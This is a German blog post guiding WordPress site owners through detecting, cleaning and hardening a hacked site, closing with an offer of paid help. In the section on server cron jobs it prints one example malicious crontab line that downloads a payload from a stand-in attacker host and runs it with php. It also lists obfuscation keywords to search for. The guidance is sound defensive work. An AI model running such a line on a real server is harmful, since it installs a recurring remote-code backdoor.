WordPress gehackt?

WordPress gehackt? Das ist zu tun

/ Allgemein, WordPress & Webentwicklung / Von

Ein gehacktes WordPress – der Albtraum vieler Website-Betreiber. Plötzlich verhält sich die eigene Seite seltsam: Besucher werden umgeleitet, unbekannte Inhalte tauchen auf oder der Login klappt nicht mehr. Bevor Panik ausbricht, lautet die Devise: Ruhe bewahren und systematisch vorgehen. Im Folgenden erhalten Sie einen klaren Schritt-für-Schritt-Leitfaden, um Ihre gehackte WordPress-Seite zu identifizieren, zu bereinigen und für die Zukunft abzusichern.

Anzeichen: Woran erkennt man einen WordPress-Hack?

Oft ist nicht sofort offensichtlich, dass eine Website kompromittiert wurde. Achten Sie auf diese typischen Anzeichen einer gehackten WordPress-Seite:

  • Unerwartete Weiterleitungen: Ihre Website leitet plötzlich auf dubiose externe Seiten um (z. B. Dating- oder Spam-Seiten). Häufig wird auch in der Google-Suche statt Ihrer Seite eine fremde URL angezeigt – ein klares Warnsignal für einen Redirect-Hack.
  • Browser- und Google-Warnungen: Browser blockieren den Zugriff mit Sicherheitswarnungen oder Google zeigt Meldungen wie „Diese Website wurde möglicherweise gehackt“. Solche Warnungen deuten auf Malware auf der Seite hin, die von Sicherheitsmechanismen erkannt wurde.
  • Unbekannte Inhalte oder Designänderungen: Ihre Startseite sieht auf einmal anders aus, enthält kryptische Zeichen oder fremde Links, die Sie nie eingefügt haben. Manche Hacker ersetzen sogar die komplette Homepage durch eine eigene Nachricht. Prüfen Sie auch die Footer- und Sidebar-Bereiche auf versteckte Spam-Links.
  • Login-Probleme und neue Admin-Benutzer: Sie können sich nicht mehr im WordPress-Backend anmelden, obwohl Benutzername/Passwort stimmen – eventuell haben Angreifer Ihr Admin-Passwort geändert. Oder Sie entdecken im Dashboard neue Administrator-Konten, die Sie nicht selbst angelegt haben. Unbekannte Benutzer mit hohen Rechten sind ein eindeutiges Indiz für einen Hack.
  • Plötzlicher Leistungsabfall: Die Website wird extrem langsam oder reagiert instabil, evtl. weil Malware Ihren Server überlastet oder Spam versendet. In einigen Fällen verhindern Schadprogramme auch bewusst bestimmte Aktionen im Backend (z. B. den Plugin-Aufruf), um ihre Entdeckung zu erschweren.
  • Verdächtige Dateien im Webspace: Finden sich per FTP in Ihrem wp-content-Ordner Dateien mit merkwürdigen Namen wie oihqwdohwq.php oder ähnlich, ist Vorsicht geboten. Solche unbekannten PHP-Dateien – vor allem im Uploads-Verzeichnis, wo eigentlich nur Bilder/Dokumente liegen sollten – deuten fast immer auf eingeschleuste Malware hin.

Wenn eines oder mehrere dieser Symptome auftreten, heißt es schnell handeln. Im nächsten Abschnitt erfahren Sie, welche Schritte Sie unternehmen sollten, um den Schaden einzudämmen und Ihre Website zurückzugewinnen.

Schritt-für-Schritt-Anleitung: Erste Hilfe bei gehackter WordPress-Seite

Im Ernstfall eines Hacks hilft ein strukturiertes Vorgehen. Folgende Schritte haben sich bewährt, um eine kompromittierte WordPress-Installation zu bereinigen. Wichtig: Führen Sie diese Maßnahmen möglichst in der angegebenen Reihenfolge durch, um weitere Schäden oder Datenverluste zu vermeiden.

Zur schnellen Übersicht finden Sie hier eine Checkliste der wichtigsten Schritte, die im Detail danach erläutert werden:

SchrittMaßnahme (Kurzfassung)
1. SofortmaßnahmenWebsite vom Netz nehmen (offline/Wartungsmodus); alle Passwörter sofort ändern; aktuelle Backups sichern;
2. SichtprüfungAdmin-Benutzerkonten prüfen (unbekannte entfernen); auf der Seite nach fremden Inhalten suchen; Dateiänderungsdatum wichtiger Dateien checken.
3. Malware-Scan & VergleichSicherheits-Plugin (z. B. Wordfence) installieren und Scan durchführen; Unterschiede zu sauberer WordPress-Version feststellen (veränderte Core-Dateien).
4. Verdächtige Dateien prüfenWichtige Dateien gezielt inspizieren: .htaccess, wp-config.php, index.php etc.; nach unbekanntem Code suchen; Uploads-Verzeichnis auf PHP-Dateien prüfen.
5. Datenbank untersuchenIn phpMyAdmin nach Schadcode suchen (z. B. in wp_options ungewöhnliche Werte); Sicherheits-Plugin ggf. Datenbank-Scan nutzen.
6. Server-Cronjobs prüfenServerseitige Cronjobs ansehen (z. B. über crontab oder Hosting-Panel) – unbekannte geplante Tasks löschen.
7. Themes & Plugins checkenAlle installierten Plugins/Themes auf Aktualität prüfen; nicht benötigte entfernen; nur offizielle Quellen nutzen; verdächtige Erweiterungen deaktivieren.

Gehen wir diese Schritte nun ausführlich durch:

Schritt 1: Sofortmaßnahmen durchführen

Zunächst gilt es, weiteren Schaden zu verhindern und Ihre Zugänge zu sichern. Handeln Sie sofort und führen Sie folgende Maßnahmen aus:

  • Website offline schalten (Wartungsmodus): Trennen Sie die infizierte Seite umgehend vom Netz. So können Hacker keinen weiteren Unfug anrichten und Besucher werden nicht gefährdet oder auf Malware geleitet. Viele Webhoster bieten einen Wartungsmodus an oder Sie nutzen ein Maintenance-Plugin, falls der Admin-Zugang noch funktioniert. Alternativ können Sie via FTP eine temporäre index.html hochladen oder einen Passwortschutz über die .htaccess setzen. Wichtig ist, dass die Seite für Außenstehende erst mal nicht erreichbar ist.
  • Beweise/Backups sichern: Erstellen Sie ein vollständiges Backup der aktuellen (gehackten) Website inklusive Datenbank, bevor Sie Änderungen vornehmen. Dies mag kontraintuitiv wirken, aber das Backup dient als Beweismittel und Referenz, um den Angriffszeitpunkt und Schadcode später analysieren zu können. Falls vorhanden, sichern Sie auch ein älteres, sauberes Backup (von vor dem Hack) – es kann bei der Wiederherstellung enorm helfen.
  • Sämtliche Passwörter ändern: Ändern Sie sofort alle Zugangsdaten, beginnend mit dem WordPress-Admin-Passwort. Nutzen Sie möglichst ein Gerät, das frei von Malware ist, um neue Passwörter zu setzen. Denken Sie an alle betroffenen Zugänge: WordPress-User, Hosting-Account, FTP/SFTP, Datenbank (MySQL-Passwort in der wp-config.php nicht vergessen!), E-Mail-Postfächer etc.. Da man nie sicher sein kann, welche Zugangsdaten eventuell ausgespäht wurden, müssen wirklich alle Passwörter ausgetauscht werden. Verwenden Sie sichere Kombinationen aus Groß/Klein, Zahlen und Sonderzeichen oder nutzen Sie einen Passwortmanager.
  • Hosting-Provider informieren: Setzen Sie Ihren Webhoster über den Vorfall in Kenntnis. Insbesondere wenn Sie Shared Hosting nutzen, kann der Hack eventuell von einer anderen Seite auf dem gleichen Server ausgegangen sein. Ihr Provider kann Ihnen helfen, z. B. die Seite serverseitig zu sperren, Logfiles auszuwerten oder Hinweise zum Ursprung der Infektion zu geben. Manche Hoster bieten auch kostenfreie Malware-Scans oder Recovery-Support an – fragen Sie nach. Außerdem: Falls der Hoster die Seite schon vorsorglich gesperrt hat (häufig der Fall, um weitere Verteilung von Schadcode zu verhindern), erfahren Sie so die nötigen Schritte zur Freischaltung nach der Bereinigung.

Haben Sie diese Sofortmaßnahmen erledigt, ist das Gröbste unter Kontrolle: Die Seite ist vorerst vom Netz, und Angreifer haben keine einfachen Eintrittspforten mehr. Jetzt beginnt die Detektivarbeit, um den Schadcode zu finden und zu entfernen.

Schritt 2: Sichtprüfung und erste Analyse

Nun geht es darum, sich einen Überblick zu verschaffen, was genau kompromittiert wurde. Mit ein paar gezielten Checks können Sie oft schon feststellen, wo die Probleme liegen:

  • Admin-Benutzerkonten prüfen: Melden Sie sich (sofern noch möglich) im WordPress-Dashboard an und kontrollieren Sie unter Benutzer → Alle Benutzer, ob unbekannte Admin-Accounts existieren. Entfernen Sie umgehend alle Einträge, die Sie nicht selbst angelegt haben. Hacker erstellen oft zusätzliche Admin-Zugänge, um selbst bei Passwortänderung Zugriff zu behalten. Reduzieren Sie die Administratoren auf das absolute Minimum (idealerweise nur Ihr eigenes Konto).
  • Inhalte und Einstellungen kontrollieren: Gehen Sie Ihre Seiten und Beiträge durch – entdecken Sie dort eingefügte Spam-Texte, Links oder fremde Scripts? Besonders häufig platzieren Angreifer schädliche Links im Footer oder in älteren Beiträgen (teils als verstecktes HTML/CSS). Überprüfen Sie auch Menüs, Widgets und Plugin-Einstellungen auf Veränderungen, die Sie nicht vorgenommen haben. Jede Auffälligkeit kann ein Hinweis auf injected Code sein.
  • Dateiänderungen überfliegen: Wenn Sie FTP-Zugang haben, sortieren Sie die Dateien nach Datum. Auffällig jüngste Änderungszeitpunkte an Core-Dateien (z. B. wp-config.php, index.php, Dateien im Theme-Ordner) können Hinweise auf Manipulation geben. Notieren Sie alle Dateien mit kürzlich verändertem Datum, besonders im Zeitraum des vermuteten Hacks. Diese Liste hilft bei der gezielten Suche nach Schadcode in Schritt 4. Falls Ihr Hosting-Panel Dateiverlaufsfunktionen oder Dateimonitoring bietet, nutzen Sie diese.

Diese Sichtprüfung verschafft Ihnen ein erstes Lagebild. Viele Hacker setzen auf einfache Methoden, die man schon auf den ersten Blick erkennen kann – etwa ein neuer Admin-Nutzer oder ein offensichtlicher Eingriff in die Startseite. Was nicht direkt sichtbar ist, wird im nächsten Schritt durch spezialisierte Tools aufgespürt.

Schritt 3: Malware-Scans und Dateivergleiche durchführen

Das Wordfence-Plugin scannt alle WordPress-Dateien und meldet z. B. veränderte Core-Dateien, benötigte Plugin-Updates oder verdächtigen Code. Solche Security-Plugins erleichtern die Malware-Fahndung erheblich.

Automatisierte Sicherheits-Scanner sind jetzt Ihre besten Helfer. Gehen Sie so vor:

  • Security-Plugin installieren und laufen lassen: Wenn nicht schon vorhanden, installieren Sie ein renommiertes Sicherheitsplugin wie Wordfence, Sucuri Security oder iThemes Security. Starten Sie einen vollständigen Scan Ihrer WordPress-Installation. Der Scanner vergleicht die Dateien auf Ihrem Webspace mit den Original-Dateien von WordPress, Themes und Plugins und erkennt so veränderte oder fremde Dateien. Auch bekannter Schadcode wird durch Signaturen erkannt. Viele Plugins listen Ihnen alle Auffälligkeiten auf und bieten Optionen, diese direkt zu entfernen oder zu reparieren. Nutzen Sie diese Funktionen mit Vorsicht – im Zweifel lieber nur melden lassen und manuell prüfen, bevor Sie etwas löschen.
  • Vergleich mit Backup / frischer Installation: Falls Sie ein sauberes Backup zur Hand haben, können Sie die infizierten Dateien damit vergleichen. Unterschiede im Code springen dabei ins Auge. Kein Backup? Laden Sie sich die aktuelle WordPress-Version von wordpress.org herunter und vergleichen Sie zumindest die Core-Verzeichnisse wp-admin und wp-includes sowie die Wurzeldateien (index.php, wp-config.php etc.) mit denen auf Ihrem Server. Alle Abweichungen (außer der wp-config.php, die ja Ihre individuellen Einstellungen enthält) sind verdächtig. Oft lohnt es sich, kompromittierte Core-Dateien einfach mit frischen Originaldateien zu überschreiben – so entfernen Sie eingebetteten Schadcode an diesen Stellen schnell und zuverlässig.
  • Ergebnisse auswerten: Schauen Sie sich die Funde des Malware-Scans genau an. Häufig betroffene Dateien sind z. B. **.htaccess sowie Theme-Dateien wie header.php, footer.php oder functions.php. Notieren Sie jede vom Scanner gemeldete Datei und jede erkannte Malware-Signatur. Prüfen Sie auch die Ignorierlisten oder ausgeschlossenen Pfade des Scanners – stellen Sie sicher, dass wirklich das gesamte Verzeichnis und alle Dateien geprüft wurden. Gegebenenfalls führen Sie den Scan mehrmals durch (bei verschiedenen Plugins), um kein verstecktes Hintertürchen zu übersehen.

Ein Beispiel: Wordfence markiert häufig verdächtige Code-Schnipsel in Dateien. Sollte Ihr Security-Plugin Ihnen konkrete Malware-Funde anzeigen, entfernen Sie diese wenn möglich direkt über das Plugin (z. B. bietet Wordfence eine Option „Repariere Datei“ an, welche die Datei auf Originalzustand zurücksetzt). Wenn der Scanner keine Bedrohungen findet, die Seite aber offenkundig gehackt ist, deutet das auf eine sehr neue oder gut getarnte Malware hin – in dem Fall müssen Sie manuell intensiver suchen.

Schritt 4: Verdächtige Dateien im Detail kontrollieren

Automatische Scans sind hilfreich, ersetzen aber nicht den gründlichen Blick in kritische Dateien. Einige Dateien werden von Hackern besonders gern manipuliert, da sie Schaltzentralen Ihrer WordPress-Installation sind:

  • Konfigurations- und Core-Dateien prüfen: Öffnen Sie die Dateien wp-config.php, .htaccess sowie die Haupt-Indexdatei (index.php) im Stammverzeichnis im Code-Editor. Suchen Sie nach Einschüben, die dort nicht hingehören – etwa unbekannte PHP-Funktionen, lange Zeichenketten in scheinbar zufälliger Kombination oder externe URL-Aufrufe. Oft verstecken Angreifer Schadcode in Form von Base64-verschlüsselten Strings oder als vermeintliche Kommentarblöcke. wp-config.php enthält z. B. ganz oben manchmal eingefügten Code, der weitere Backdoors lädt. Hacker fügen häufig genau in diese kritischen Dateien Schadcode ein, weil sie beim WordPress-Start automatisch ausgeführt werden. Alles, was Ihnen in diesen Dateien nicht vertraut vorkommt, ist verdächtig.
  • Theme- und Plugin-Dateien: Schauen Sie als Nächstes in den Ordner /wp-content/themes/ zu Ihrem aktiven Theme. Öffnen Sie die functions.php sowie header.php und footer.php Ihres Themes. Diese werden oft modifiziert, um z. B. im Seitenkopf versteckte Spam-Links oder Skripte einzuschleusen. Dasselbe gilt für aktive Plugins: Durchforsten Sie die PHP-Dateien nach Hinweisen auf Malware (Dateien mit obskuren Namen oder Code-Blöcke, die nicht vom Plugin stammen könnten). Hier ist Fachwissen hilfreich – bei Unsicherheit lieber einen Entwickler oder Ihr Support-Team fragen.
  • Uploads-Verzeichnis und sonstige Ordner: Im Ordner /wp-content/uploads/ sollten sich ausschließlich Medien-Dateien (Bilder, PDFs, etc.) befinden. Finden Sie dort PHP- oder .js-Dateien, ist das ein Alarmzeichen – löschen oder quarantänisieren Sie diese Dateien (nachdem sie im Backup gesichert wurden). Auch in /wp-includes/ und /wp-admin/ sollten keine zusätzlichen Dateien liegen, die nicht Teil einer Standard-Installation sind. Viele Hacks legen z. B. eine Datei namens wp-info.php oder ähnlich in /wp-includes/ ab – solche unbekannten Files konsequent entfernen. Überprüfen Sie auch die Rechte der Dateien und Ordner (Permissions); unübliche Rechte können auf eine Manipulation hinweisen.

Tipp: Suchen Sie in verdächtigen PHP-Dateien nach Keywords wie base64_decode, eval(, gzinflate oder bekannten Malware-Signaturen (die Scanner-Meldung gibt evtl. einen Hinweis). Wird Ihnen so ein Muster z. B. in der functions.php angezeigt, dann ist diese definitiv kompromittiert und sollte durch eine saubere Originalversion ersetzt werden.

Gerade Backdoor-Skripte tarnen sich gut. Bleiben Sie daher misstrauisch bei jeder Datei, die Sie nicht eindeutig zuordnen können. Lieber einmal mehr löschen als eine Hintertür übersehen – sofern Sie ein Backup haben, können entfernte Dateien im Zweifelsfall wiederhergestellt werden.

Schritt 5: Datenbank auf Schadcode untersuchen

Nicht nur die Dateien, auch die MySQL-Datenbank kann von Angreifern manipuliert werden. Darüber werden z. B. neue Admin-Konten angelegt oder bösartige Scripts in gespeichertem Content untergebracht. Gehen Sie wie folgt vor:

  • Datenbank-Backup und Zugang: Erstellen Sie zunächst auch von der Datenbank ein Backup (falls nicht bereits in Schritt 1 geschehen). Öffnen Sie dann ein DB-Verwaltungstool wie phpMyAdmin (oft im Hosting-Kontrollzentrum verfügbar) und wählen Sie Ihre WordPress-Datenbank aus.
  • wp_users und wp_options prüfen: Schauen Sie in der Tabelle wp_users nach, ob dort unbekannte Benutzerkonten existieren, die ggf. im WordPress-Backend verborgen blieben (z. B. weil die Angreifer die Benutzerliste manipuliert haben). Löschen Sie verdächtige Einträge oder setzen Sie zumindest deren Passwörter zurück. In der Tabelle wp_options finden sich globale Einstellungen – hier nisten sich Hacks gern ein, indem sie z. B. den siteurl oder home-Option-Wert verändern (für Redirects) oder neue Optionen mit Schadcode anlegen. Sortieren Sie die wp_options nach option_value und suchen Sie nach auffälligen <script>-Tags, iframes oder langen verschlüsselten Textblöcken. Injected Code in der Datenbank lässt sich oft hier entdecken und sollte entfernt werden.
  • Inhalte durchsuchen: Auch Beiträge (wp_posts) oder andere Felder können kompromittiert sein. Suchen Sie in der Datenbank global nach bekannten Spam-Begriffen oder fremden URLs, die Sie in Ihrem Content nicht erwarten. Manche Malware fügt beispielsweise unsichtbare Spam-Links in jeden Post ein. Nutzen Sie die Suchfunktion von phpMyAdmin mit Stichworten, die im Hack-Kontext aufgetaucht sind (z. B. Domainnamen der Weiterleitung). Entfernen oder bereinigen Sie gefundene Fragmente vorsichtig, und testen Sie, ob die Seite danach normal lädt.
  • Plugins zur DB-Prüfung: Falls das manuelle Prüfen schwerfällt, können Sicherheitsplugins mit Datenbank-Scan helfen. Einige WordPress-Security-Plugins prüfen bei ihren Scans auch die Datenbanktabellen auf bekannte Malware-Signaturen oder Anomalien. Es gibt auch spezialisierte Scanner-Plugins wie NinjaScanner, die die DB mit durchsuchen. Lassen Sie solche Tools laufen und beheben Sie die gemeldeten Probleme. Dennoch ersetzt das nicht die manuelle Kontrolle wichtiger Felder – vor allem, wenn Sie verdächtige Ergebnisse sehen, ist Expertenhilfe ratsam (Datenbankänderungen können komplex sein).

Die Datenbank wird bei vielen Reinigungen übersehen, doch Malware kann sich hartnäckig in DB-Einträgen festsetzen. Insbesondere wenn die Infektion nach dem Dateicleaning immer wiederkehrt, sollten Sie die Datenbank als Quelle in Betracht ziehen.

Schritt 6: Server-Cronjobs auf Malware prüfen

Häufig richten Hacker sogenannte Cronjobs auf dem Server ein, um ihre Kontrolle aufrecht zu erhalten. Cronjobs sind zeitgesteuerte Aufgaben auf Linux-Servern, die z. B. alle X Minuten eine Aktion ausführen. Ein Angreifer kann damit erreichen, dass selbst nach Löschung aller Dateien der Schadcode nachgeladen wird.

  • Cronjobs verstehen: WordPress selbst nutzt „WP-Cron“ für geplante Aufgaben (Pseudo-Cron via PHP-Aufrufe). Hier geht es jedoch um Server-seitige Cronjobs außerhalb von WordPress. Diese können Sie z. B. über die Kommandozeile (crontab -e) oder ein Hosting-Panel (oft unter „Geplante Aufgaben“) einsehen.
  • Cron-Liste überprüfen: Kontrollieren Sie alle eingetragenen Cronjobs. Achten Sie auf suspekte Einträge, die Sie selbst nicht angelegt haben. Ein typischer bösartiger Cronjob könnte etwa so aussehen: */15 * * * * wget -q -O /tmp/xyz.php http://malicious-site.xyz/payload.txt && php /tmp/xyz.php Solche Jobs laden in regelmäßigen Abständen schädlichen Code vom Hacker-Server herunter und führen ihn aus. Dadurch kann sich Malware immer wieder neu installieren, selbst nachdem Sie sie entfernt haben.
  • Unbekannte Jobs löschen: Entfernen Sie alle Cron-Einträge, die Sie nicht eindeutig zuordnen können. Dokumentieren Sie sie ggf. vorher (Screenshot), um nachvollziehen zu können, was der Angreifer getan hat. Wichtig: Führen Sie diesen Check vor dem finalen Bereinigen durch – denn wenn ein schädlicher Cron weiterhin aktiv ist, kann er die frisch gesäuberte Seite sofort wieder infizieren.
  • WP-Cron sichern: In seltenen Fällen tragen sich Schadcode-Skripte auch in den WP-internen Cron ein (z. B. via manipulierter Plugins). Sie können mit Plugins wie „WP Crontrol“ einen Blick auf geplante WP-Cron-Ereignisse werfen. Hier sollten nur bekannte Tasks auftauchen (Updates, Backups, geplante Veröffentlichungen etc.). Unerklärliche WP-Cron-Einträge am besten entfernen.

Nicht jeder Webseitenbetreiber hat direkten Serverzugang – sollten Sie auf einem Shared-Hosting-Paket keine Möglichkeit haben, Cronjobs selbst einzusehen, bitten Sie Ihren Hosting-Support, dies für Sie zu übernehmen. Cronjobs sind eine beliebte Hintertür, die technisch weniger versierte Admins leicht übersehen, also nehmen Sie diesen Schritt ernst, um eine Reinfection zu verhindern.

Schritt 7: Themes und Plugins überprüfen

Zum Abschluss der Ursachenforschung richten Sie den Blick auf Ihre installierten Themes und Plugins – häufig sind diese der Ursprung der Sicherheitslücke.

  • Plugins und Themes aktualisieren: Stellen Sie sicher, dass alle Ihre Plugins sowie das WordPress-Core und Theme auf dem neuesten Stand sind. Viele Hacks nutzen bekannte Schwachstellen in veralteten Versionen aus. Nach einem Hack sofort updaten, um weitere Lücken zu schließen.
  • Dubiose Quellen meiden: Nutzen Sie nur Plugins/Themes aus offiziellen Quellen (WordPress.org, vertrauenswürdige Entwicklerseiten). Vermuten Sie, dass ein Plugin aus unsicherer Quelle stammt oder sogar ein sogenanntes „nulled“ (raubkopiertes Premium-Plugin) ist – entfernen Sie es lieber umgehend. Solche Pakete können absichtlich Hintertüren enthalten. Im Zweifel ersetzen Sie ein Plugin durch eine frische Kopie direkt vom Original-Anbieter.
  • Unbenutzte Erweiterungen löschen: Deaktivierte Plugins oder ungenutzte Themes stellen ebenfalls ein Risiko dar, wenn sie nicht aktuell gehalten werden. Löschen Sie konsequent alles, was Sie nicht wirklich brauchen. Jede zusätzliche Erweiterung ist eine potenzielle Angriffsfläche. Nach dem Hack sollte Ihr System so schlank wie möglich sein.
  • Theme-Integrität prüfen: Besonders gefährlich sind kompromittierte oder veraltete Themes. Wenn Ihr aktives Theme schon länger kein Update erhalten hat und der Hack eventuell darüber erfolgte, überlegen Sie, ob Sie zu einem sichereren Theme wechseln. Entfernen Sie alle Themes außer dem aktiven (und evtl. einem Standard-Theme als Fallback). Nicht aktive Themes können ebenfalls Sicherheitslücken haben – oder bereits Malware beinhalten, die im Hintergrund wirkt.
  • Plugins mit bekannten Schwachstellen: Informieren Sie sich, ob eines Ihrer Plugins jüngst als verwundbar bekannt wurde (z. B. via Exploit-Datenbanken oder die Plugin-Changelogs). Oft gibt es Blog-Posts zu aktuellen WP-Hacks, die bestimmte Plugins ins Visier nehmen. Finden Sie heraus, wie die Angreifer eindringen konnten – so können Sie gezielt dieses Einfallstor schließen (durch Update oder Entfernen der betroffenen Erweiterung).

Durch diese Überprüfung Ihrer Erweiterungen reduzieren Sie das Risiko, dass der gleiche Hack erneut passiert. Viele Hacks sind Folge mangelnder Updates oder unsicherer Drittanbieter-Plugins. Lernen Sie daraus und setzen Sie künftig nur noch auf gut gewartete Software.

Wiederherstellung und Absicherung der Website

Haben Sie die obigen Schritte durchgeführt, sollten Sie ein recht genaues Bild der Lage haben. Jetzt gilt es, die Seite entweder von den Funden zu bereinigen oder ein sauberes System wiederherzustellen – und anschließend dauerhaft abzusichern.

Bereinigung oder Neuinstallation der Website

Je nach Schwere des Befalls stehen zwei Ansätze zur Wahl:

  • Manuelle Bereinigung der Dateien: Wenn der Schadcode nur in wenigen Dateien steckt (und Sie ihn identifiziert haben), können Sie versuchen, diese Dateien zu bereinigen. Entfernen Sie die eingefügten Code-Stellen oder ersetzen Sie die Dateien komplett durch frische Originale (z. B. WordPress-Core-Dateien, Theme- oder Plugin-Dateien aus dem offiziellen Download). Stellen Sie sicher, dass wirklich alle Hintertüren erwischt wurden – prüfen Sie besonders gründlich die in den vorherigen Schritten gefundenen verdächtigen Dateien. Denken Sie daran: Angreifer hinterlassen gerne gut getarnte Backdoors, um später erneut Zugriff zu erlangen. Eine Bereinigung erfordert daher Sorgfalt und Erfahrung. Wenn Sie unsicher sind, holen Sie professionelle Hilfe hinzu, um nichts zu übersehen.
  • Wiederherstellung aus Backup: Verfügen Sie über ein aktuelles, sauberes Backup von kurz vor dem Hack, ist dies oft der schnellste und sicherste Weg, Ihre Seite zurückzusetzen. Spielen Sie das Backup ein (Dateien und Datenbank) und entfernen Sie anschließend die Schwachstelle, die zum Hack führte (z. B. aktualisieren Sie das betroffene Plugin). Achten Sie darauf, dass das Backup wirklich unkompromittiert ist – vergleichen Sie zur Sicherheit ein paar Dateien mit der frisch heruntergeladenen WordPress-Version. Wenn das Backup schon älter ist, wägen Sie ab: Inhalte, die seitdem erstellt wurden, müssten nachträglich rekonstuiert werden. Dennoch ist ein sauberes System wichtiger als ein paar verlorene Änderungen.
  • Neuinstallation im Extremfall: Lässt sich die Infektion partout nicht vollständig entfernen, ziehen Sie einen kompletten Neuaufbau in Betracht. Das bedeutet: Webspace leer räumen, WordPress neu installieren, ein unverseuchtes Backup Ihrer Datenbank einspielen (oder eine frische Datenbank aufsetzen und die Inhalte manuell migrieren). Laden Sie Themes und Plugins nur von den Originalquellen neu herunter. Ihre Uploads (Medien) können Sie aus dem Backup übernehmen, aber prüfen Sie diese vorher auf versteckte PHP-Dateien. Dieser Weg ist drastisch, aber garantiert, dass wirklich kein Schadcode zurückbleibt – insbesondere bei sehr komplexen Hacks mit Rootkits oder tiefgreifenden Backdoors ist oft Tabula Rasa die sichere Lösung.

Ob Bereinigung oder Neuinstallation: Ändern Sie nach Abschluss erneut alle Passwörter (zur Sicherheit auch jene, die Sie schon in Schritt 1 geändert hatten). So stellen Sie sicher, dass niemand mehr Zugriff hat. Außerdem sollten Sie nun alle Schutzmaßnahmen ergreifen, um einen erneuten Hack zu verhindern.

Sicherheits-Plugins und -Tools einsetzen

Nachdem Ihre Website bereinigt ist, rüsten Sie sie mit zusätzlichen Sicherheitsmaßnahmen aus:

  • Firewall- und Scan-Plugins installieren: Falls noch nicht geschehen, behalten Sie ein Security-Plugin wie Wordfence oder iThemes Security dauerhaft aktiv. Wordfence z. B. bietet eine Web Application Firewall (WAF), die viele Angriffe blockiert, sowie regelmäßige Malware-Scans Ihrer Dateien. iThemes Security fokussiert sich auf das Hardening von WordPress (z. B. Schutz vor Bruteforce-Login, Dateimonitoring, Änderung der Login-URL etc.). Solche Plugins erhöhen die Hürde für Angreifer erheblich. Konfigurieren Sie die Firewall so streng wie nötig – etwa können Sie Backend-Zugriffe auf Ihre IP beschränken, Login-Versuche limitieren und XML-RPC (falls nicht benötigt) abschalten.
  • Aktive Überwachung: Viele Sicherheitslösungen bieten Echtzeit-Monitoring an. Aktivieren Sie E-Mail-Benachrichtigungen, wenn auffällige Ereignisse passieren (z. B. viele fehlgeschlagene Logins, Dateiänderungen, neue Plugins werden installiert usw.). So werden Sie im Falle eines erneuten Angriffs sofort alarmiert und können reagieren, bevor größerer Schaden entsteht.
  • Malware-Scan von extern: Ergänzend können Sie ab und zu Online-Scanner wie Sucuri SiteCheck oder VirusTotal nutzen, die Ihre Website aus Besuchersicht prüfen. Diese zeigen z. B. an, ob Ihre Seite auf bekannten Blacklists steht oder noch schädliche Scripts ausliefert. Wenn Google Ihre Seite als gefährlich markiert hatte, sollten Sie über die Google Search Console nach der Bereinigung einen Überprüfungsantrag stellen, um die Warnungen entfernen zu lassen.

Updates, Backups und Login-Sicherheit

Langfristig schützen Sie Ihre WordPress-Seite am besten, indem Sie grundlegende Sicherheitspraktiken beherzigen:

  • Regelmäßige Updates: Halten Sie WordPress-Core, Plugins und Themes stets aktuell. Aktivieren Sie im Zweifel automatische Updates (zumindest für kleinere Core-Updates und Plugin-Updates). Viele Angriffe passieren, weil bekannte Sicherheitslücken in veralteten Versionen nicht geschlossen wurden. Planen Sie feste Wartungstermine ein oder nutzen Sie einen Wartungsservice, um nichts zu verpassen.
  • Starke Passwörter & 2-Faktor-Authentifizierung: Verwenden Sie einzigartige, komplexe Passwörter für alle Logins. Passwörter wie „Sommer2020“ oder Standard-Logins wie „admin“ sind leichtes Spiel für Hacker. Nutzen Sie einen Passwortmanager zur Verwaltung. Aktivieren Sie außerdem Zwei-Faktor-Authentifizierung (2FA) für Ihren WordPress-Login, sofern möglich. Viele Security-Plugins bieten 2FA an. Dadurch benötigen Angreifer neben dem Passwort auch Ihr Smartphone, was einen Hack nahezu verhindert.
  • Admin-Bereich zusätzlich schützen: Ändern Sie ggf. die Login-URL von /wp-admin auf einen individuellen Pfad (Plugins wie WPS Hide Login machen das einfach). Richten Sie einen Verzeichnisschutz per .htaccess für den /wp-admin-Ordner ein (also einen zweiten Login auf Serverebene). So müssen Angreifer zwei Hürden überwinden. Entfernen Sie den Standard-Admin-Benutzernamen „admin“ – legen Sie einen neuen Admin unter anderem Namen an und löschen Sie den alten User.
  • Regelmäßige Backups: Etablieren Sie eine zuverlässige Backup-Routine. Im Idealfall werden tägliche Backups erstellt (via Plugin wie UpdraftPlus oder auf Server-Ebene). Speichern Sie Backups extern, nicht nur auf dem gleichen Server – z. B. in einer Cloud oder lokal. So sind Sie bei einem erneuten Hack oder Serverausfall abgesichert und können die Website schnell wiederherstellen.
  • Auf Sicherheit achten (Hosting & Co.): Wählen Sie einen seriösen Hosting-Anbieter, der auf Sicherheit Wert legt (aktuelles PHP, Firewall, DDoS-Schutz etc.). Kommunizieren Sie keine Passwörter unverschlüsselt und achten Sie auf Ihren lokalen PC-Schutz (ein Trojaner auf Ihrem Rechner kann Ihre FTP-Zugangsdaten ausspähen). Schulen Sie auch Mit-Administratoren, sichere Passwörter und Verfahren einzuhalten. Kurz: Bauen Sie eine „Sicherheitskultur“ rund um Ihre Website auf, um zukünftigen Angriffen vorzubeugen.

Mit diesen Maßnahmen machen Sie Ihre WordPress-Seite weit robuster gegen Angriffe. Einen absolut 100%igen Schutz gibt es zwar nie – aber Sie reduzieren die Wahrscheinlichkeit eines erfolgreichen Hacks drastisch.

Fazit: Ruhe bewahren – und bei Bedarf Hilfe holen

Ein WordPress-Hack ist zweifellos stressig, aber kein Grund zur Resignation. Mit den oben beschriebenen Schritten können Sie den Schaden begrenzen, Ihre Website säubern und sogar gestärkt aus dem Vorfall hervorgehen. Wichtig ist vor allem, schnell zu reagieren und systematisch vorzugehen, statt kopflos zu handeln.

Denken Sie daran: Sie sind nicht allein. Sollten Sie sich unsicher fühlen oder der Umfang der Bereinigung überfordern, zögern Sie nicht, professionelle Hilfe in Anspruch zu nehmen. Als WordPress-Sicherheitsexperte stehe ich Ihnen gerne zur Seite – von der Malware-Entfernung über einen gründlichen Sicherheits-Check bis hin zur langfristigen Absicherung Ihrer Website.

Ihre Website wurde gehackt? Handeln Sie jetzt. Kontaktieren Sie mich über unser Kontaktformular für eine schnelle Hilfe – wir helfen Ihnen schnell, diskret und zuverlässig, damit Ihre WordPress-Seite bald wieder sicher online ist und Sie ruhig schlafen können. Sie müssen diesen Kampf nicht allein kämpfen – wir kümmern uns darum! 💪

